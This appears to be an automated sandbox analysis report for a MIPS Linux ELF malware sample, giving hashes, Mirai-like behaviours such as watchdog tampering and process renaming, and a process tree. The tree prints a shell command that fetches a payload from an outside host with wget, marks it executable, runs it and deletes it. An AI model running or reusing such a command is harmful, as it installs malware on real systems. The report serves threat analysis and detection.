Analysis
-
max time kernel
140s -
max time network
144s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240221-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240221-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
23/02/2024, 05:41
Behavioral task
behavioral1
Sample
e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717.elf
Resource
debian9-mipsbe-20240221-en
General
-
Target
e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717.elf
-
Size
155KB
-
MD5
2efc897ea0e1c4cf156506f598e2cac9
-
SHA1
c056f0536cc81194d0d0b74afb5013d43daaca1e
-
SHA256
e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717
-
SHA512
136f0ddcdb18fc17364f64330a7a99a72aa68f15a0f7ae18d529e75eb65be55b41782937c2790f02dcce31605a603cc5be8f90499dcbdd6042cea2c2ec78627d
-
SSDEEP
3072:B7esBFP23rWfOB7ZOOyGOWKmrThPaLEne7rNb:1euCloGOrmrThPaLEne7rNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 708 e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 726 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717.elf/tmp/e2ca76a3d4a51aa9fc1f0eb8943e886876a70ec80534af9685683426be59e717.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:708 -
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."2⤵PID:710
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....3⤵
- Writes file to tmp directory
PID:716
-
-
/bin/chmodchmod 777 .....3⤵PID:724
-
-
/tmp/....../.....3⤵
- Executes dropped EXE
PID:726
-
-
/bin/sh/bin/sh ./.....3⤵PID:726
-
-
/bin/rmrm -rf .....3⤵PID:729
-
-